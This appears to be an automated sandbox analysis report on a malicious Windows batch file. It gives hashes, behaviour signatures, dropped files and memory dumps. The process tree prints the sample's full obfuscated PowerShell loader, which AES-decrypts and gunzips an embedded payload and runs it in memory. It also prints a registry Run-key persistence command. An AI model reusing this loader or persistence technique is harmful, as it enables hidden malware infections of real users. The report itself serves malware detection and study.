310b3a077e02c52674f6863a1d7beeb34cfef1b115f0a9e048cb1e8fe7cfcbb3

Analysis

max time kernel
1s
max time network
151s
platform
windows10-2004_x64
resource
win10v2004-20231215-en
resource tags

arch:x64arch:x86image:win10v2004-20231215-enlocale:en-usos:windows10-2004-x64system
submitted
08/01/2024, 20:50

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

310b3a077e02c52674f6863a1d7beeb34cfef1b115f0a9e048cb1e8fe7cfcbb3.bat
Size

1.6MB
MD5

4fbb5e9e5b5690f1b361f9f67d10e25c
SHA1

b77eeb5b8b08f5dfa427cd078423e4f190a28c41
SHA256

310b3a077e02c52674f6863a1d7beeb34cfef1b115f0a9e048cb1e8fe7cfcbb3
SHA512

640cac38739d0d0d1ad8f8dac89b444197ce3778d9eebe864e52ff4902f752c0a3971591f787cc67ecadd538cd2668409423403b2fef2928cfcd837b5b98c770
SSDEEP

24576:qK9lTH+TerznENh/hOe4/Vty848E2CYMjGUdaDJG8wxspPFZ4SAIXnp:Ld+TAnEzZpgP48NmzUWM

Score

7^/10

Malware Config

Signatures

Executes dropped EXE 1 IoCs

pid	Process
4360	310b3a077e02c52674f6863a1d7beeb34cfef1b115f0a9e048cb1e8fe7cfcbb3.bat.exe

Suspicious behavior: EnumeratesProcesses 2 IoCs

pid	Process
4360	310b3a077e02c52674f6863a1d7beeb34cfef1b115f0a9e048cb1e8fe7cfcbb3.bat.exe
4360	310b3a077e02c52674f6863a1d7beeb34cfef1b115f0a9e048cb1e8fe7cfcbb3.bat.exe

Suspicious use of AdjustPrivilegeToken 1 IoCs

description	pid	Process
Token: SeDebugPrivilege	4360	310b3a077e02c52674f6863a1d7beeb34cfef1b115f0a9e048cb1e8fe7cfcbb3.bat.exe

Suspicious use of WriteProcessMemory 2 IoCs

description	pid	Process	procid_target
PID 5076 wrote to memory of 4360	5076	cmd.exe	31
PID 5076 wrote to memory of 4360	5076	cmd.exe	31

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\310b3a077e02c52674f6863a1d7beeb34cfef1b115f0a9e048cb1e8fe7cfcbb3.bat"
1⤵
- Suspicious use of WriteProcessMemory
PID:5076
- C:\Users\Admin\AppData\Local\Temp\310b3a077e02c52674f6863a1d7beeb34cfef1b115f0a9e048cb1e8fe7cfcbb3.bat.exe
  "310b3a077e02c52674f6863a1d7beeb34cfef1b115f0a9e048cb1e8fe7cfcbb3.bat.exe" -noprofile -windowstyle hidden -ep bypass -command $_CASH_EpMhA = [System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Local\Temp\310b3a077e02c52674f6863a1d7beeb34cfef1b115f0a9e048cb1e8fe7cfcbb3.bat').Split([Environment]::NewLine);foreach ($_CASH_XmsgQ in $_CASH_EpMhA) { if ($_CASH_XmsgQ.StartsWith(':: @')) { $_CASH_ZQHrQ = $_CASH_XmsgQ.Substring(4); break; }; };$_CASH_ZQHrQ = [System.Text.RegularExpressions.Regex]::Replace($_CASH_ZQHrQ, '_CASH_', '');$_CASH_SYRjr = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($_CASH_ZQHrQ);$_CASH_PvKMs = New-Object System.Security.Cryptography.AesManaged;$_CASH_PvKMs.Mode = [System.Security.Cryptography.CipherMode]::CBC;$_CASH_PvKMs.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$_CASH_PvKMs.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('6hNp6znpdVtLRa88u+RJyOIAqy0yV+kZzUW8J2gDR2A=');$_CASH_PvKMs.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('yDzuGGfzy2kiH4wwo0D5Gg==');$_CASH_GbaEH = $_CASH_PvKMs.CreateDecryptor();$_CASH_SYRjr = $_CASH_GbaEH.TransformFinalBlock($_CASH_SYRjr, 0, $_CASH_SYRjr.Length);$_CASH_GbaEH.Dispose();$_CASH_PvKMs.Dispose();$_CASH_NifoM = New-Object System.IO.MemoryStream(, $_CASH_SYRjr);$_CASH_AvJfW = New-Object System.IO.MemoryStream;$_CASH_wZAxN = New-Object System.IO.Compression.GZipStream($_CASH_NifoM, [IO.Compression.CompressionMode]::Decompress);$_CASH_wZAxN.CopyTo($_CASH_AvJfW);$_CASH_wZAxN.Dispose();$_CASH_NifoM.Dispose();$_CASH_AvJfW.Dispose();$_CASH_SYRjr = $_CASH_AvJfW.ToArray();$_CASH_VbXeh = [System.Reflection.Assembly]::('daoL'[-1..-4] -join '')($_CASH_SYRjr);$_CASH_eGoft = $_CASH_VbXeh.EntryPoint;$_CASH_eGoft.Invoke($null, (, [string[]] ('')))
  2⤵
  - Executes dropped EXE
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:4360
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "powershell.exe" Remove-ItemProperty -Path 'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run' -Name '310b3a077e02c52674f6863a1d7beeb34cfef1b115f0a9e048cb1e8fe7cfcbb3.bat';New-ItemProperty -Path 'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run' -Name '310b3a077e02c52674f6863a1d7beeb34cfef1b115f0a9e048cb1e8fe7cfcbb3.bat' -Value '"C:\Users\Admin\AppData\Local\Temp\310b3a077e02c52674f6863a1d7beeb34cfef1b115f0a9e048cb1e8fe7cfcbb3.bat.exe"' -PropertyType 'String'
    3⤵
    PID:4140

Network

MITRE ATT&CK Matrix

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
227556da5e65f6819f477756808c17e4

SHA1
6ffce766e881ca2a60180bb25f4981b183f78279

SHA256
101f5fe8a4192f14e9f0a12c105ca81c9f176860930af44747185dd1bedb59a4

SHA512
d46b935809d2c4b7a041ad790f2db11c0a808df022c91ae9152b8769021b884fde49653a7a46557ef9ee65e274fe0b6c8503df9b50e6b3b849fefacf51f8bd6a

Download Submit
C:\Users\Admin\AppData\Local\Temp\310b3a077e02c52674f6863a1d7beeb34cfef1b115f0a9e048cb1e8fe7cfcbb3.bat.exe

Filesize
22KB

MD5
7665a993d32d1486f5508d933f037d90

SHA1
f881a345895f5b093c8b0b1b715bb541380970dd

SHA256
c5aefb45657ad9b15fdb86f3c84baab237de98fea7177eeac0ef8f5c786b93a2

SHA512
058421b50531ed059bc95d9c033e2c26d8e959677359fa1881b8908324eb2c55253a0acb4e640affbd6eaad0057e07da00e9ad662ffa7ae1f7057d6705f71cca

Download Submit
C:\Users\Admin\AppData\Local\Temp\310b3a077e02c52674f6863a1d7beeb34cfef1b115f0a9e048cb1e8fe7cfcbb3.bat.exe

Filesize
183KB

MD5
a549354b000284df2199996df6542728

SHA1
bee835c67f139026d952169e90cd9e10f7c2161d

SHA256
52d24c03ebea6fd7d3a230203c28defac90f0a91cb5bf0ffb67e04fcd5c05160

SHA512
32f687c5a0a2a7dd2d2f923a06420e506fd297c2f00d2fe65a383a7714dd80095d181e37a634b88c7a0f391a1ef3187daa0a0e541857512c44aa291d2b83fcde

Download Submit
C:\Users\Admin\AppData\Local\Temp\Costura\1485B29524EF63EB83DF771D39CCA767\64\sqlite.interop.dll

Filesize
64KB

MD5
b0ff6c01f2178cc3fa88aa81a684ba96

SHA1
557c9d272bd021fd6bfb52d0492e156d518eb71c

SHA256
0ccbd3caeb13ef25ff0b7b527673d15da9b1d66a37f170067657e747c6d0af74

SHA512
5f1de9ddc7b9f59aa7fb5872c1f96d9e7468d5bafa4715e44d454cf80b6b21fb9bf6285294945a72a39c6f0a60e5f042ec3cdcc6df52e72d15ea945d683a1dae

Download Submit
C:\Users\Admin\AppData\Local\Temp\Fuqtgdbataf.tmp

Filesize
61KB

MD5
b49c90679b4d095c347299b90d710780

SHA1
1dd720622f578ee9c7f12739cc021c023d25d227

SHA256
a4e3201a8f8cc042aa37d06104e5ba7de83df6786ca40e4a7fe7e0fc27878d00

SHA512
681bc72e46d55c47c5d93914dd294ed4fc07446c40f8a1c5875c76a2c3569c12db59c9f76351163551dab30ba8a2f95b21a69de909f92c9709cdd05ed63b93ea

Download Submit
C:\Users\Admin\AppData\Local\Temp\Pdgzcb.tmp

Filesize
89KB

MD5
89315ade6ec1a810721566d2e4a31bc7

SHA1
7d13c641a26900c97d44d81e0af18f5dfcfb5d41

SHA256
9d085335ea760e155b2866377b122160bad8d609e37ba7d54acea1433453471b

SHA512
56f4e989f92e6ec8f0b3e7d289866267f5162cfca99d56bcf796346565c3e2408e2779e96ce2d1043206a0f843d1b0fc668f6ef07b389c48a771338ecda822a0

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_tv54e5ig.q1o.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
memory/4140-2313-0x00007FFF33150000-0x00007FFF33C11000-memory.dmp

Filesize
10.8MB

Download
memory/4140-2304-0x00007FFF33150000-0x00007FFF33C11000-memory.dmp

Filesize
10.8MB

Download
memory/4140-2305-0x0000017258DF0000-0x0000017258E00000-memory.dmp

Filesize
64KB

Download
memory/4140-2307-0x0000017258DF0000-0x0000017258E00000-memory.dmp

Filesize
64KB

Download
memory/4140-2306-0x0000017258DF0000-0x0000017258E00000-memory.dmp

Filesize
64KB

Download
memory/4360-49-0x000002426D230000-0x000002426D336000-memory.dmp

Filesize
1.0MB

Download
memory/4360-35-0x000002426D230000-0x000002426D336000-memory.dmp

Filesize
1.0MB

Download
memory/4360-37-0x000002426D230000-0x000002426D336000-memory.dmp

Filesize
1.0MB

Download
memory/4360-43-0x000002426D230000-0x000002426D336000-memory.dmp

Filesize
1.0MB

Download
memory/4360-51-0x000002426D230000-0x000002426D336000-memory.dmp

Filesize
1.0MB

Download
memory/4360-55-0x000002426D230000-0x000002426D336000-memory.dmp

Filesize
1.0MB

Download
memory/4360-57-0x000002426D230000-0x000002426D336000-memory.dmp

Filesize
1.0MB

Download
memory/4360-65-0x000002426D230000-0x000002426D336000-memory.dmp

Filesize
1.0MB

Download
memory/4360-69-0x000002426D230000-0x000002426D336000-memory.dmp

Filesize
1.0MB

Download
memory/4360-73-0x000002426D230000-0x000002426D336000-memory.dmp

Filesize
1.0MB

Download
memory/4360-79-0x000002426D230000-0x000002426D336000-memory.dmp

Filesize
1.0MB

Download
memory/4360-85-0x000002426D230000-0x000002426D336000-memory.dmp

Filesize
1.0MB

Download
memory/4360-83-0x000002426D230000-0x000002426D336000-memory.dmp

Filesize
1.0MB

Download
memory/4360-81-0x000002426D230000-0x000002426D336000-memory.dmp

Filesize
1.0MB

Download
memory/4360-77-0x000002426D230000-0x000002426D336000-memory.dmp

Filesize
1.0MB

Download
memory/4360-75-0x000002426D230000-0x000002426D336000-memory.dmp

Filesize
1.0MB

Download
memory/4360-71-0x000002426D230000-0x000002426D336000-memory.dmp

Filesize
1.0MB

Download
memory/4360-67-0x000002426D230000-0x000002426D336000-memory.dmp

Filesize
1.0MB

Download
memory/4360-63-0x000002426D230000-0x000002426D336000-memory.dmp

Filesize
1.0MB

Download
memory/4360-61-0x000002426D230000-0x000002426D336000-memory.dmp

Filesize
1.0MB

Download
memory/4360-59-0x000002426D230000-0x000002426D336000-memory.dmp

Filesize
1.0MB

Download
memory/4360-53-0x000002426D230000-0x000002426D336000-memory.dmp

Filesize
1.0MB

Download
memory/4360-31-0x000002426D230000-0x000002426D336000-memory.dmp

Filesize
1.0MB

Download
memory/4360-47-0x000002426D230000-0x000002426D336000-memory.dmp

Filesize
1.0MB

Download
memory/4360-45-0x000002426D230000-0x000002426D336000-memory.dmp

Filesize
1.0MB

Download
memory/4360-41-0x000002426D230000-0x000002426D336000-memory.dmp

Filesize
1.0MB

Download
memory/4360-39-0x000002426D230000-0x000002426D336000-memory.dmp

Filesize
1.0MB

Download
memory/4360-33-0x000002426D230000-0x000002426D336000-memory.dmp

Filesize
1.0MB

Download
memory/4360-29-0x000002426D230000-0x000002426D336000-memory.dmp

Filesize
1.0MB

Download
memory/4360-27-0x000002426D230000-0x000002426D336000-memory.dmp

Filesize
1.0MB

Download
memory/4360-23-0x000002426D230000-0x000002426D336000-memory.dmp

Filesize
1.0MB

Download
memory/4360-22-0x000002426D230000-0x000002426D336000-memory.dmp

Filesize
1.0MB

Download
memory/4360-2237-0x000002426D3E0000-0x000002426D42C000-memory.dmp

Filesize
304KB

Download
memory/4360-2236-0x000002426D340000-0x000002426D3DE000-memory.dmp

Filesize
632KB

Download
memory/4360-2238-0x00007FFF33150000-0x00007FFF33C11000-memory.dmp

Filesize
10.8MB

Download
memory/4360-2239-0x000002426A930000-0x000002426A940000-memory.dmp

Filesize
64KB

Download
memory/4360-2240-0x000002426A930000-0x000002426A940000-memory.dmp

Filesize
64KB

Download
memory/4360-2241-0x000002426A930000-0x000002426A940000-memory.dmp

Filesize
64KB

Download
memory/4360-2242-0x000002426D430000-0x000002426D640000-memory.dmp

Filesize
2.1MB

Download
memory/4360-25-0x000002426D230000-0x000002426D336000-memory.dmp

Filesize
1.0MB

Download
memory/4360-2247-0x00007FFF3E370000-0x00007FFF3E389000-memory.dmp

Filesize
100KB

Download
memory/4360-2248-0x000002426A930000-0x000002426A940000-memory.dmp

Filesize
64KB

Download
memory/4360-2249-0x000002426D7E0000-0x000002426D85A000-memory.dmp

Filesize
488KB

Download
memory/4360-2250-0x000002426DCB0000-0x000002426DD1C000-memory.dmp

Filesize
432KB

Download
memory/4360-2254-0x000002426DD20000-0x000002426DD46000-memory.dmp

Filesize
152KB

Download
memory/4360-2253-0x000002426DD60000-0x000002426DD9A000-memory.dmp

Filesize
232KB

Download
memory/4360-21-0x000002426D230000-0x000002426D33A000-memory.dmp

Filesize
1.0MB

Download
memory/4360-20-0x000002426D160000-0x000002426D230000-memory.dmp

Filesize
832KB

Download
memory/4360-18-0x000002426CE10000-0x000002426D126000-memory.dmp

Filesize
3.1MB

Download
memory/4360-14-0x00007FFF33150000-0x00007FFF33C11000-memory.dmp

Filesize
10.8MB

Download
memory/4360-15-0x000002426A930000-0x000002426A940000-memory.dmp

Filesize
64KB

Download
memory/4360-17-0x000002426A930000-0x000002426A940000-memory.dmp

Filesize
64KB

Download
memory/4360-16-0x000002426A930000-0x000002426A940000-memory.dmp

Filesize
64KB

Download
memory/4360-4-0x000002426CB90000-0x000002426CBB2000-memory.dmp

Filesize
136KB

Download
memory/4360-2314-0x00007FFF33150000-0x00007FFF33C11000-memory.dmp

Filesize
10.8MB

Download
memory/4360-2315-0x00007FFF3E370000-0x00007FFF3E389000-memory.dmp

Filesize
100KB

Download